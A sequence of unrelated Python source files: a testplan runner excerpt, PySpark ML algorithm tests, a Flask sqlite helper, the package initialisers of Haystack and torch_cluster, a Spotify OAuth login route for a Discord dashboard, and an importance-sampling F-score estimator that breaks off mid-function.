self.logger.log_test_status(
self.cfg.name, self._result.test_report.status
)
def _invoke_exporters(self):
# Add this logic into a ReportExporter(Runnable)
# that will return a result containing errors
if hasattr(self._result.test_report, "bubble_up_attachments"):
self._result.test_report.bubble_up_attachments()
for exporter in self.exporters:
if isinstance(exporter, test_exporters.Exporter):
exp_result = ExporterResult.run_exporter(
exporter=exporter,
source=self._result.test_report,
type="test",
)
if not exp_result.success:
logger.TESTPLAN_LOGGER.error(exp_result.traceback)
self._result.exporter_results.append(exp_result)
else:
raise NotImplementedError(
"Exporter logic not implemented for: {}".format(
type(exporter)
)
)
def _post_exporters(self):
# View report in web browser if "--browse" specified
report_urls = []
report_opened = False
for result in self._result.exporter_results:
exporter = result.exporter
if getattr(exporter, "report_url", None) and self.cfg.browse:
report_urls.append(exporter.report_url)
if getattr(exporter, "_web_server_thread", None):
                # Give priority to opening the report from the local server
webbrowser.open(exporter.report_url)
report_opened = True
                # Stay blocked here until the web server terminates
self._web_server_thread = exporter._web_server_thread
self._web_server_thread.join()
if self.cfg.browse and not report_opened:
if len(report_urls) > 0:
for report_url in report_urls:
webbrowser.open(report_url)
else:
self.logger.warning(
"No reports opened, could not find "
"an exported result to browse"
)
def aborting(self):
"""Stop the web server if it is running."""
if self._web_server_thread is not None:
self._web_server_thread.stop()
self._close_file_logger()
def _configure_stdout_logger(self):
"""Configure the stdout logger by setting the required level."""
logger.STDOUT_HANDLER.setLevel(self.cfg.logger_level)
def _configure_file_logger(self):
"""
Configure the file logger to the specified log levels. A log file
will be created under the runpath (so runpath must be created before
this method is called).
"""
if self.runpath is None:
raise RuntimeError(
"Need to set up runpath before configuring logger"
)
if self.cfg.file_log_level is None:
self.logger.debug("Not enabling file logging")
else:
self._file_log_handler = logger.configure_file_logger(
self.cfg.file_log_level, self.runpath
)
def _close_file_logger(self):
"""
Closes the file logger, releasing all file handles. This is necessary to
avoid permissions errors on Windows.
"""
if self._file_log_handler is not None:
self._file_log_handler.flush()
self._file_log_handler.close()
logger.TESTPLAN_LOGGER.removeHandler(self._file_log_handler)
self._file_log_handler = None
|
the-stack_0_25183
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from shutil import rmtree
import sys
import tempfile
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
import numpy as np
from pyspark.ml.classification import DecisionTreeClassifier, LogisticRegression, \
MultilayerPerceptronClassifier, OneVsRest
from pyspark.ml.clustering import DistributedLDAModel, KMeans, LocalLDAModel, LDA, LDAModel
from pyspark.ml.fpm import FPGrowth
from pyspark.ml.linalg import Matrices, Vectors
from pyspark.ml.recommendation import ALS
from pyspark.ml.regression import GeneralizedLinearRegression, LinearRegression
from pyspark.sql import Row
from pyspark.testing.mlutils import SparkSessionTestCase
class LogisticRegressionTest(SparkSessionTestCase):
def test_binomial_logistic_regression_with_bound(self):
df = self.spark.createDataFrame(
[(1.0, 1.0, Vectors.dense(0.0, 5.0)),
(0.0, 2.0, Vectors.dense(1.0, 2.0)),
(1.0, 3.0, Vectors.dense(2.0, 1.0)),
(0.0, 4.0, Vectors.dense(3.0, 3.0)), ], ["label", "weight", "features"])
lor = LogisticRegression(regParam=0.01, weightCol="weight",
lowerBoundsOnCoefficients=Matrices.dense(1, 2, [-1.0, -1.0]),
upperBoundsOnIntercepts=Vectors.dense(0.0))
model = lor.fit(df)
self.assertTrue(
np.allclose(model.coefficients.toArray(), [-0.2944, -0.0484], atol=1E-4))
self.assertTrue(np.isclose(model.intercept, 0.0, atol=1E-4))
def test_multinomial_logistic_regression_with_bound(self):
data_path = "data/mllib/sample_multiclass_classification_data.txt"
df = self.spark.read.format("libsvm").load(data_path)
lor = LogisticRegression(regParam=0.01,
lowerBoundsOnCoefficients=Matrices.dense(3, 4, range(12)),
upperBoundsOnIntercepts=Vectors.dense(0.0, 0.0, 0.0))
model = lor.fit(df)
expected = [[4.593, 4.5516, 9.0099, 12.2904],
[1.0, 8.1093, 7.0, 10.0],
[3.041, 5.0, 8.0, 11.0]]
for i in range(0, len(expected)):
self.assertTrue(
np.allclose(model.coefficientMatrix.toArray()[i], expected[i], atol=1E-4))
self.assertTrue(
np.allclose(model.interceptVector.toArray(), [-0.9057, -1.1392, -0.0033], atol=1E-4))
class MultilayerPerceptronClassifierTest(SparkSessionTestCase):
def test_raw_and_probability_prediction(self):
data_path = "data/mllib/sample_multiclass_classification_data.txt"
df = self.spark.read.format("libsvm").load(data_path)
mlp = MultilayerPerceptronClassifier(maxIter=100, layers=[4, 5, 4, 3],
blockSize=128, seed=123)
model = mlp.fit(df)
test = self.sc.parallelize([Row(features=Vectors.dense(0.1, 0.1, 0.25, 0.25))]).toDF()
result = model.transform(test).head()
expected_prediction = 2.0
expected_probability = [0.0, 0.0, 1.0]
expected_rawPrediction = [57.3955, -124.5462, 67.9943]
        self.assertEqual(result.prediction, expected_prediction)
self.assertTrue(np.allclose(result.probability, expected_probability, atol=1E-4))
self.assertTrue(np.allclose(result.rawPrediction, expected_rawPrediction, atol=1E-4))
class OneVsRestTests(SparkSessionTestCase):
def test_copy(self):
df = self.spark.createDataFrame([(0.0, Vectors.dense(1.0, 0.8)),
(1.0, Vectors.sparse(2, [], [])),
(2.0, Vectors.dense(0.5, 0.5))],
["label", "features"])
lr = LogisticRegression(maxIter=5, regParam=0.01)
ovr = OneVsRest(classifier=lr)
ovr1 = ovr.copy({lr.maxIter: 10})
self.assertEqual(ovr.getClassifier().getMaxIter(), 5)
self.assertEqual(ovr1.getClassifier().getMaxIter(), 10)
model = ovr.fit(df)
model1 = model.copy({model.predictionCol: "indexed"})
self.assertEqual(model1.getPredictionCol(), "indexed")
def test_output_columns(self):
df = self.spark.createDataFrame([(0.0, Vectors.dense(1.0, 0.8)),
(1.0, Vectors.sparse(2, [], [])),
(2.0, Vectors.dense(0.5, 0.5))],
["label", "features"])
lr = LogisticRegression(maxIter=5, regParam=0.01)
ovr = OneVsRest(classifier=lr, parallelism=1)
model = ovr.fit(df)
output = model.transform(df)
self.assertEqual(output.columns, ["label", "features", "prediction"])
def test_parallelism_doesnt_change_output(self):
df = self.spark.createDataFrame([(0.0, Vectors.dense(1.0, 0.8)),
(1.0, Vectors.sparse(2, [], [])),
(2.0, Vectors.dense(0.5, 0.5))],
["label", "features"])
ovrPar1 = OneVsRest(classifier=LogisticRegression(maxIter=5, regParam=.01), parallelism=1)
modelPar1 = ovrPar1.fit(df)
ovrPar2 = OneVsRest(classifier=LogisticRegression(maxIter=5, regParam=.01), parallelism=2)
modelPar2 = ovrPar2.fit(df)
for i, model in enumerate(modelPar1.models):
self.assertTrue(np.allclose(model.coefficients.toArray(),
modelPar2.models[i].coefficients.toArray(), atol=1E-4))
self.assertTrue(np.allclose(model.intercept, modelPar2.models[i].intercept, atol=1E-4))
def test_support_for_weightCol(self):
df = self.spark.createDataFrame([(0.0, Vectors.dense(1.0, 0.8), 1.0),
(1.0, Vectors.sparse(2, [], []), 1.0),
(2.0, Vectors.dense(0.5, 0.5), 1.0)],
["label", "features", "weight"])
# classifier inherits hasWeightCol
lr = LogisticRegression(maxIter=5, regParam=0.01)
ovr = OneVsRest(classifier=lr, weightCol="weight")
self.assertIsNotNone(ovr.fit(df))
# classifier doesn't inherit hasWeightCol
dt = DecisionTreeClassifier()
ovr2 = OneVsRest(classifier=dt, weightCol="weight")
self.assertIsNotNone(ovr2.fit(df))
class KMeansTests(SparkSessionTestCase):
def test_kmeans_cosine_distance(self):
data = [(Vectors.dense([1.0, 1.0]),), (Vectors.dense([10.0, 10.0]),),
(Vectors.dense([1.0, 0.5]),), (Vectors.dense([10.0, 4.4]),),
(Vectors.dense([-1.0, 1.0]),), (Vectors.dense([-100.0, 90.0]),)]
df = self.spark.createDataFrame(data, ["features"])
kmeans = KMeans(k=3, seed=1, distanceMeasure="cosine")
model = kmeans.fit(df)
result = model.transform(df).collect()
self.assertTrue(result[0].prediction == result[1].prediction)
self.assertTrue(result[2].prediction == result[3].prediction)
self.assertTrue(result[4].prediction == result[5].prediction)
class LDATest(SparkSessionTestCase):
def _compare(self, m1, m2):
"""
Temp method for comparing instances.
TODO: Replace with generic implementation once SPARK-14706 is merged.
"""
self.assertEqual(m1.uid, m2.uid)
self.assertEqual(type(m1), type(m2))
self.assertEqual(len(m1.params), len(m2.params))
for p in m1.params:
if m1.isDefined(p):
self.assertEqual(m1.getOrDefault(p), m2.getOrDefault(p))
self.assertEqual(p.parent, m2.getParam(p.name).parent)
if isinstance(m1, LDAModel):
self.assertEqual(m1.vocabSize(), m2.vocabSize())
self.assertEqual(m1.topicsMatrix(), m2.topicsMatrix())
def test_persistence(self):
# Test save/load for LDA, LocalLDAModel, DistributedLDAModel.
df = self.spark.createDataFrame([
[1, Vectors.dense([0.0, 1.0])],
[2, Vectors.sparse(2, {0: 1.0})],
], ["id", "features"])
# Fit model
lda = LDA(k=2, seed=1, optimizer="em")
distributedModel = lda.fit(df)
self.assertTrue(distributedModel.isDistributed())
localModel = distributedModel.toLocal()
self.assertFalse(localModel.isDistributed())
# Define paths
path = tempfile.mkdtemp()
lda_path = path + "/lda"
dist_model_path = path + "/distLDAModel"
local_model_path = path + "/localLDAModel"
# Test LDA
lda.save(lda_path)
lda2 = LDA.load(lda_path)
self._compare(lda, lda2)
# Test DistributedLDAModel
distributedModel.save(dist_model_path)
distributedModel2 = DistributedLDAModel.load(dist_model_path)
self._compare(distributedModel, distributedModel2)
# Test LocalLDAModel
localModel.save(local_model_path)
localModel2 = LocalLDAModel.load(local_model_path)
self._compare(localModel, localModel2)
# Clean up
try:
rmtree(path)
except OSError:
pass
class FPGrowthTests(SparkSessionTestCase):
def setUp(self):
super(FPGrowthTests, self).setUp()
self.data = self.spark.createDataFrame(
[([1, 2], ), ([1, 2], ), ([1, 2, 3], ), ([1, 3], )],
["items"])
def test_association_rules(self):
fp = FPGrowth()
fpm = fp.fit(self.data)
expected_association_rules = self.spark.createDataFrame(
[([3], [1], 1.0, 1.0), ([2], [1], 1.0, 1.0)],
["antecedent", "consequent", "confidence", "lift"]
)
actual_association_rules = fpm.associationRules
self.assertEqual(actual_association_rules.subtract(expected_association_rules).count(), 0)
self.assertEqual(expected_association_rules.subtract(actual_association_rules).count(), 0)
def test_freq_itemsets(self):
fp = FPGrowth()
fpm = fp.fit(self.data)
expected_freq_itemsets = self.spark.createDataFrame(
[([1], 4), ([2], 3), ([2, 1], 3), ([3], 2), ([3, 1], 2)],
["items", "freq"]
)
actual_freq_itemsets = fpm.freqItemsets
self.assertEqual(actual_freq_itemsets.subtract(expected_freq_itemsets).count(), 0)
self.assertEqual(expected_freq_itemsets.subtract(actual_freq_itemsets).count(), 0)
def tearDown(self):
del self.data
class ALSTest(SparkSessionTestCase):
def test_storage_levels(self):
df = self.spark.createDataFrame(
[(0, 0, 4.0), (0, 1, 2.0), (1, 1, 3.0), (1, 2, 4.0), (2, 1, 1.0), (2, 2, 5.0)],
["user", "item", "rating"])
als = ALS().setMaxIter(1).setRank(1)
# test default params
als.fit(df)
self.assertEqual(als.getIntermediateStorageLevel(), "MEMORY_AND_DISK")
self.assertEqual(als._java_obj.getIntermediateStorageLevel(), "MEMORY_AND_DISK")
self.assertEqual(als.getFinalStorageLevel(), "MEMORY_AND_DISK")
self.assertEqual(als._java_obj.getFinalStorageLevel(), "MEMORY_AND_DISK")
# test non-default params
als.setIntermediateStorageLevel("MEMORY_ONLY_2")
als.setFinalStorageLevel("DISK_ONLY")
als.fit(df)
self.assertEqual(als.getIntermediateStorageLevel(), "MEMORY_ONLY_2")
self.assertEqual(als._java_obj.getIntermediateStorageLevel(), "MEMORY_ONLY_2")
self.assertEqual(als.getFinalStorageLevel(), "DISK_ONLY")
self.assertEqual(als._java_obj.getFinalStorageLevel(), "DISK_ONLY")
class GeneralizedLinearRegressionTest(SparkSessionTestCase):
def test_tweedie_distribution(self):
df = self.spark.createDataFrame(
[(1.0, Vectors.dense(0.0, 0.0)),
(1.0, Vectors.dense(1.0, 2.0)),
(2.0, Vectors.dense(0.0, 0.0)),
(2.0, Vectors.dense(1.0, 1.0)), ], ["label", "features"])
glr = GeneralizedLinearRegression(family="tweedie", variancePower=1.6)
model = glr.fit(df)
self.assertTrue(np.allclose(model.coefficients.toArray(), [-0.4645, 0.3402], atol=1E-4))
self.assertTrue(np.isclose(model.intercept, 0.7841, atol=1E-4))
model2 = glr.setLinkPower(-1.0).fit(df)
self.assertTrue(np.allclose(model2.coefficients.toArray(), [-0.6667, 0.5], atol=1E-4))
self.assertTrue(np.isclose(model2.intercept, 0.6667, atol=1E-4))
def test_offset(self):
df = self.spark.createDataFrame(
[(0.2, 1.0, 2.0, Vectors.dense(0.0, 5.0)),
(0.5, 2.1, 0.5, Vectors.dense(1.0, 2.0)),
(0.9, 0.4, 1.0, Vectors.dense(2.0, 1.0)),
(0.7, 0.7, 0.0, Vectors.dense(3.0, 3.0))], ["label", "weight", "offset", "features"])
glr = GeneralizedLinearRegression(family="poisson", weightCol="weight", offsetCol="offset")
model = glr.fit(df)
self.assertTrue(np.allclose(model.coefficients.toArray(), [0.664647, -0.3192581],
atol=1E-4))
self.assertTrue(np.isclose(model.intercept, -1.561613, atol=1E-4))
class LinearRegressionTest(SparkSessionTestCase):
def test_linear_regression_with_huber_loss(self):
data_path = "data/mllib/sample_linear_regression_data.txt"
df = self.spark.read.format("libsvm").load(data_path)
lir = LinearRegression(loss="huber", epsilon=2.0)
model = lir.fit(df)
expectedCoefficients = [0.136, 0.7648, -0.7761, 2.4236, 0.537,
1.2612, -0.333, -0.5694, -0.6311, 0.6053]
expectedIntercept = 0.1607
expectedScale = 9.758
self.assertTrue(
np.allclose(model.coefficients.toArray(), expectedCoefficients, atol=1E-3))
self.assertTrue(np.isclose(model.intercept, expectedIntercept, atol=1E-3))
self.assertTrue(np.isclose(model.scale, expectedScale, atol=1E-3))
if __name__ == "__main__":
from pyspark.ml.tests.test_algorithms import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports')
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
the-stack_0_25185
|
import sqlite3
import click
from flask import current_app, g
from flask.cli import with_appcontext
def get_db():
if 'db' not in g:
g.db = sqlite3.connect(
current_app.config['DATABASE'],
detect_types=sqlite3.PARSE_DECLTYPES
)
g.db.row_factory = sqlite3.Row
return g.db
def close_db(e=None):
db = g.pop('db', None)
if db is not None:
db.close()
def init_db():
db = get_db()
with current_app.open_resource('schema.sql') as f:
db.executescript(f.read().decode('utf8'))
@click.command('init-db')
@with_appcontext
def init_db_command():
"""Clear the existing data and create new tables."""
init_db()
click.echo('Initialized the database.')
def init_app(app):
app.teardown_appcontext(close_db)
app.cli.add_command(init_db_command)
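# Typical wiring in the application factory (factory shape assumed, following
# the Flask tutorial layout this module mirrors):
#   def create_app():
#       app = Flask(__name__, instance_relative_config=True)
#       app.config.from_mapping(
#           DATABASE=os.path.join(app.instance_path, 'app.sqlite'),
#       )
#       from . import db
#       db.init_app(app)
#       return app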
|
the-stack_0_25186
|
import logging
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from haystack.constants import DEFAULT_ALIAS
from haystack import signals
from haystack.utils import loading
__author__ = 'Daniel Lindsley'
__version__ = (2, 0, 1, 'dev')
# Setup default logging.
log = logging.getLogger('haystack')
stream = logging.StreamHandler()
stream.setLevel(logging.INFO)
log.addHandler(stream)
# Help people clean up from 1.X.
if hasattr(settings, 'HAYSTACK_SITECONF'):
raise ImproperlyConfigured('The HAYSTACK_SITECONF setting is no longer used & can be removed.')
if hasattr(settings, 'HAYSTACK_SEARCH_ENGINE'):
raise ImproperlyConfigured('The HAYSTACK_SEARCH_ENGINE setting has been replaced with HAYSTACK_CONNECTIONS.')
if hasattr(settings, 'HAYSTACK_ENABLE_REGISTRATIONS'):
raise ImproperlyConfigured('The HAYSTACK_ENABLE_REGISTRATIONS setting is no longer used & can be removed.')
if hasattr(settings, 'HAYSTACK_INCLUDE_SPELLING'):
raise ImproperlyConfigured('The HAYSTACK_INCLUDE_SPELLING setting is now a per-backend setting & belongs in HAYSTACK_CONNECTIONS.')
# Check the 2.X+ bits.
if not hasattr(settings, 'HAYSTACK_CONNECTIONS'):
raise ImproperlyConfigured('The HAYSTACK_CONNECTIONS setting is required.')
if DEFAULT_ALIAS not in settings.HAYSTACK_CONNECTIONS:
raise ImproperlyConfigured("The default alias '%s' must be included in the HAYSTACK_CONNECTIONS setting." % DEFAULT_ALIAS)
# Load the connections.
connections = loading.ConnectionHandler(settings.HAYSTACK_CONNECTIONS)
# Load the router(s).
connection_router = loading.ConnectionRouter()
if hasattr(settings, 'HAYSTACK_ROUTERS'):
if not isinstance(settings.HAYSTACK_ROUTERS, (list, tuple)):
raise ImproperlyConfigured("The HAYSTACK_ROUTERS setting must be either a list or tuple.")
connection_router = loading.ConnectionRouter(settings.HAYSTACK_ROUTERS)
# Setup the signal processor.
signal_processor_path = getattr(settings, 'HAYSTACK_SIGNAL_PROCESSOR', 'haystack.signals.BaseSignalProcessor')
signal_processor_class = loading.import_class(signal_processor_path)
signal_processor = signal_processor_class(connections, connection_router)
# Per-request, reset the ghetto query log.
# Probably not extraordinarily thread-safe but should only matter when
# DEBUG = True.
def reset_search_queries(**kwargs):
for conn in connections.all():
conn.reset_queries()
if settings.DEBUG:
from django.core import signals as django_signals
django_signals.request_started.connect(reset_search_queries)
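# Illustrative example (added for clarity, not part of the original file): a
# minimal settings block that satisfies the checks above.  The simple backend
# shown ships with Haystack; swap in your real search engine's backend.
#
# HAYSTACK_CONNECTIONS = {
#     'default': {
#         'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',
#     },
# }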
|
the-stack_0_25187
|
import importlib
import os.path as osp
import torch
__version__ = '1.5.5'
for library in [
'_version', '_grid', '_graclus', '_fps', '_rw', '_sampler', '_nearest',
'_knn', '_radius'
]:
torch.ops.load_library(importlib.machinery.PathFinder().find_spec(
library, [osp.dirname(__file__)]).origin)
if torch.version.cuda is not None: # pragma: no cover
cuda_version = torch.ops.torch_cluster.cuda_version()
if cuda_version == -1:
major = minor = 0
elif cuda_version < 10000:
major, minor = int(str(cuda_version)[0]), int(str(cuda_version)[2])
else:
major, minor = int(str(cuda_version)[0:2]), int(str(cuda_version)[3])
t_major, t_minor = [int(x) for x in torch.version.cuda.split('.')]
if t_major != major or t_minor != minor:
raise RuntimeError(
f'Detected that PyTorch and torch_cluster were compiled with '
f'different CUDA versions. PyTorch has CUDA version '
f'{t_major}.{t_minor} and torch_cluster has CUDA version '
f'{major}.{minor}. Please reinstall the torch_cluster that '
f'matches your PyTorch install.')
from .graclus import graclus_cluster # noqa
from .grid import grid_cluster # noqa
from .fps import fps # noqa
from .nearest import nearest # noqa
from .knn import knn, knn_graph # noqa
from .radius import radius, radius_graph # noqa
from .rw import random_walk # noqa
from .sampler import neighbor_sampler # noqa
__all__ = [
'graclus_cluster',
'grid_cluster',
'fps',
'nearest',
'knn',
'knn_graph',
'radius',
'radius_graph',
'random_walk',
'neighbor_sampler',
'__version__',
]
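# Illustrative usage sketch (added for clarity, not part of the original file):
# building a k-NN graph and running farthest point sampling on random points.
# The tensor shapes and parameter values are assumptions chosen for the example.
def _example_usage():
    x = torch.rand(32, 3)              # 32 points in 3-D
    edge_index = knn_graph(x, k=4)     # (2, num_edges) edge list
    sampled_idx = fps(x, ratio=0.25)   # indices of roughly a quarter of the points
    return edge_index, sampled_idx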
|
the-stack_0_25188
|
# Future
from __future__ import annotations
# Standard Library
import secrets
# Packages
import aiohttp.web
import aiohttp_session
import aiospotify
# My stuff
from core import config
from core.app import Dashboard
async def spotify_login(request: aiohttp.web.Request) -> aiohttp.web.Response:
session = await aiohttp_session.get_session(request)
state = secrets.token_urlsafe(20)
session["spotify_state"] = state
return aiohttp.web.HTTPFound(
f"https://accounts.spotify.com/authorize/?"
f"client_id={config.SPOTIFY_CLIENT_ID}&"
f"response_type=code&"
f"redirect_uri={config.SPOTIFY_LOGIN_REDIRECT}&"
f"state={state}&"
f"scope=playlist-read-private%20playlist-read-collaborative%20user-read-private%20user-read-playback-state%20user-read-currently-playing%20"
f"user-library-read%20user-read-playback-position%20user-read-recently-played%20user-top-read%20&"
f"show_dialog=True"
)
async def spotify_login_callback(request: aiohttp.web.Request) -> aiohttp.web.Response:
if error := request.query.get("error"):
return aiohttp.web.Response(text=f"you cancelled the login prompt: {error}", status=400)
session = await aiohttp_session.get_session(request)
if session.get("spotify_state") != request.query.get("state"):
return aiohttp.web.Response(text="'state' query parameters do not match.", status=400)
app: Dashboard = request.app # type: ignore
if not (user := await app.get_user(session)):
return aiohttp.web.Response(text="you are not logged in with discord.", status=400)
async with app.session.post(
url="https://accounts.spotify.com/api/token",
data={
"client_id": config.SPOTIFY_CLIENT_ID,
"client_secret": config.SPOTIFY_CLIENT_SECRET,
"grant_type": "authorization_code",
"code": request.query["code"],
"redirect_uri": config.SPOTIFY_LOGIN_REDIRECT,
},
headers={
"Content-Type": "application/x-www-form-urlencoded"
}
) as response:
if response.status != 200:
return aiohttp.web.Response(text="something went wrong while requesting spotify access token.", status=400)
data = await response.json()
await app.db.execute("UPDATE users SET spotify_refresh_token = $1 WHERE id = $2", data["refresh_token"], user.id)
app.spotify_user_credentials[user.id] = aiospotify.UserCredentials(data, config.SPOTIFY_CLIENT_ID, config.SPOTIFY_CLIENT_SECRET)
return aiohttp.web.HTTPFound("/profile")
def setup(app: aiohttp.web.Application) -> None:
app.add_routes(
[
aiohttp.web.get(r"/api/spotify/login", spotify_login),
aiohttp.web.get(r"/api/spotify/login/callback", spotify_login_callback)
]
)
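# Illustrative sketch (added for clarity, not part of the original file): how the
# routes above might be attached to the running application.  Constructing the
# project's Dashboard app is project-specific, so the lines below are only an
# assumed shape, not the actual startup code.
#
#     app = Dashboard()
#     setup(app)
#     aiohttp.web.run_app(app, port=8080)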
|
the-stack_0_25189
|
import math
import numpy as np
from sklearn.isotonic import IsotonicRegression
# Alternative to tree: isotonic regression
def fit_isotonic(y_test, prob_pos):
"""Given 0/1 labels 'y_test' and predicted model scores 'prob_pos', Train
an isotonic regression model to calibrate model scores."""
try:
iso_reg = IsotonicRegression(out_of_bounds="clip").fit(prob_pos, y_test)
except RuntimeError:
iso_reg = None
return iso_reg
def sample_iso(
y_pred,
prob_pos,
iso_reg,
samples,
g,
alpha,
d_set,
):
"""
Weighted sampling of rows to label
Args:
y_pred: predicted labels (k,)
prob_pos: model scores (k,)
iso_reg: isotonic regression model (or None)
samples: number of datapoints to sample (int)
g: current best-prediction of the F-Score (float in [0,1])
alpha: defines the F_{\alpha} score estimated (float in [0,1])
alpha = 0 -> recall
alpha = 1 -> precision
alpha = 0.5 -> F1
d_set: indicators of whether each datapoint has already been labeled (k,)
set this to np.zeros((k)) if no datapoints have been labeled
Returns:
sampled rows (samples,)
        weights of sampled rows (samples,)
"""
num_rows = len(y_pred)
# Deterministically sample the rows that have already been labeled
# (since they require no additional budget)
d_rows = np.where(d_set)[0]
d_weights = np.ones(len(d_rows))
if len(d_rows) > samples:
return d_rows, d_weights
samples -= len(d_rows)
# Sample randomly if there's no isotonic regression model available for calibration
# Otherwise, use the calibration model to compute calibrated probabilities 'p_1'
if iso_reg is None:
rand_rows = np.random.choice(num_rows, size=samples, replace=True)
return np.concatenate([rand_rows, d_rows]), np.concatenate(
[np.full((samples), 1.0 / num_rows), d_weights]
)
else:
p_1 = iso_reg.predict(prob_pos) * 0.98 + 0.01 # Just to smooth 0 and 1
# Compute Sawade et al.'s sampling weights from the calibrated probabilities 'p_1'
weight_1 = np.sqrt(p_1 * ((1.0 - g) ** 2) + ((alpha * g) ** 2) * (1.0 - p_1))
weight_0 = (1 - alpha) * np.sqrt(p_1 * (g ** 2))
weights = weight_1 * y_pred + weight_0 * (1 - y_pred)
# Sample according to 'weights' and return the rows sampled along with their
# associated weights
weight_sum = np.sum(weights)
        if weight_sum > 0:
            # Restrict sampling to rows that have not been labeled yet.  (The
            # original expression `d_set is not True` compared the array's
            # identity with the True singleton and never filtered anything.)
            unlabeled = ~d_set.astype(bool)
            weights = weights[unlabeled].squeeze()
            weights /= np.sum(weights)
            options = np.arange(num_rows)
            options = options[unlabeled].squeeze()
rand_row_indices = np.random.choice(
len(options), size=samples, p=weights, replace=True
)
rand_rows = options[rand_row_indices]
return np.concatenate([rand_rows, d_rows]), np.concatenate(
[1.0 / (weights[rand_row_indices] * samples), d_weights]
)
else:
# If all weights are zero, sample randomly
rand_rows = np.random.choice(num_rows, size=samples, replace=True)
return np.concatenate([rand_rows, d_rows]), np.concatenate(
[np.full(samples, 1.0 / num_rows), d_weights]
)
def get_fscore(y_pred, y_test, rows, weights):
"""
Compute F-Score from sampled rows and weights
Args:
y_pred: model predictions (k,)
y_test: ground-truth labels (k,)
rows: sampled rows (samples,)
weights: sampled weights (samples,)
Returns:
score: estimated F-Score
trialstd: estimated standard deviation of F-Score estimate
        den: sum of the sampled weights (denominator of the weighted estimate)
"""
unique_rows = np.unique(rows)
unique_weights = np.array([weights[rows == elem].sum() for elem in unique_rows])
rows = unique_rows
weights = unique_weights
# Compute F-Score
num = ((y_test[rows] == y_pred[rows]) * weights).sum()
den = weights.sum()
score = num / den
# Compute standard deviation of estimate
var = ((((y_test[rows] == y_pred[rows]) - score) ** 2) * (weights ** 2)).mean() / (
(weights.mean() ** 2) * (1.0 - ((weights ** 2).sum() / (weights.sum() ** 2)))
)
n = len(rows)
trialstd = np.sqrt(var) / np.sqrt(n)
return score, trialstd, den
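# Illustrative worked example (added for clarity, not part of the original file):
# with uniform weights over three sampled rows, get_fscore reduces to the plain
# fraction of sampled rows where prediction and label agree.  The arrays are made up.
def _example_get_fscore():
    y_pred = np.array([1, 0, 1, 1])
    y_test = np.array([1, 0, 0, 1])
    rows = np.array([0, 2, 3])
    weights = np.ones(3)
    score, trialstd, den = get_fscore(y_pred, y_test, rows, weights)
    # Here rows 0 and 3 agree while row 2 does not, so score == 2/3 and den == 3.
    return score, trialstd, den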
def ais_singleiter(
y_pred, y_test, prob_pos, sample_budget, g, alpha, known_rows, filter_rows
):
"""
Perform a single AIS iteration of calibration + sampling
Args:
y_pred: model predictions (k,)
y_test: ground-truth labels for sampled rows (samples,)
prob_pos: model scores (k,)
sample_budget: labeling budget for the iteration (int)
g: current best-prediction of the F-Score (float in [0,1])
alpha: defines the F_{\alpha} score estimated (float in [0,1])
alpha = 0 -> recall
alpha = 1 -> precision
alpha = 0.5 -> F1
        known_rows: boolean indicators of rows that have already been labeled (k,)
        filter_rows: index array restricting sampling to a
            subset of rows
    Returns:
        rand_rows: sampled rows (samples,)
        weights: weights of the sampled rows (samples,)
"""
if np.sum(known_rows) > 0:
iso_reg = fit_isotonic(y_test, prob_pos[known_rows])
else:
iso_reg = None
rand_rows, weights = sample_iso(
y_pred[filter_rows],
prob_pos[filter_rows],
iso_reg,
sample_budget,
g,
alpha,
known_rows[filter_rows],
)
return rand_rows, weights
def ais_fullalgorithm(y_pred, y_test, prob_pos, sample_budget):
"""
Combine iterative AIS sampling with F-Score computation to compute best
estimate of F-Score
Args:
y_pred: model predictions (k,)
y_test: ground-truth labels (used as oracle) (k,)
prob_pos: model scores (k,)
sample_budget: total labeling budget (int)
Returns:
prf1: estimates of (precision, recall, F1)
stds: estimates of standard deviation of estimated (precision, recall, F1)
budget: actual labeling budget used (int)
"""
# Initialize relevant variables
k_keep = 4
measurements = []
stds = []
measurement_weights = []
all_rand_rows = []
avg_budget = 0
g = 0.5
alpha = 0.5
starting_budget = 10
iteration_count = np.floor(np.log2(sample_budget / starting_budget)).astype(int) + 1
# Sampling loop to iteratively sample batches of points to label
for i in range(iteration_count):
# Restrict sampling domain in early iterations when there aren't many
# labeled positives
# This significantly improves performance on rare categories
poses = y_pred.sum()
if (3 * (i + 1)) * poses < len(y_pred):
filter_rows = np.argpartition(prob_pos, -((3 * (i + 1)) * poses))[
-((3 * (i + 1)) * poses) :
]
else:
filter_rows = np.arange(len(y_pred))
# Enumerate the already-sampled rows
if len(all_rand_rows) > 0:
unique_rows = np.unique(np.concatenate(all_rand_rows))
known_rows = np.zeros(len(y_pred), dtype=bool)
known_rows[unique_rows] = True
else:
known_rows = np.zeros(len(y_pred), dtype=bool)
# Double sampling budget every iteration
if i == (iteration_count - 1):
iter_budget = sample_budget
else:
iter_budget = starting_budget * (2 ** i)
# Use AIS algorithm to sample rows to label
rand_rows, weights = ais_singleiter(
y_pred=y_pred,
y_test=y_test[known_rows],
prob_pos=prob_pos,
sample_budget=iter_budget,
g=g,
alpha=alpha,
known_rows=known_rows,
filter_rows=filter_rows,
)
all_rand_rows.append(filter_rows[rand_rows])
rand_rows = filter_rows[rand_rows]
weights *= len(rand_rows) / len(y_pred)
# Compute precision, recall, and F1 using sampled rows and weights
# Also computes the standard deviation of the estimates
prec, prec_trialstd, prec_den = get_fscore(
y_pred,
y_test,
rand_rows,
weights * y_pred[rand_rows],
)
rec, rec_trialstd, rec_den = get_fscore(
y_pred,
y_test,
rand_rows,
weights * y_test[rand_rows],
)
f1, f1_trialstd, f1_den = get_fscore(
y_pred,
y_test,
rand_rows,
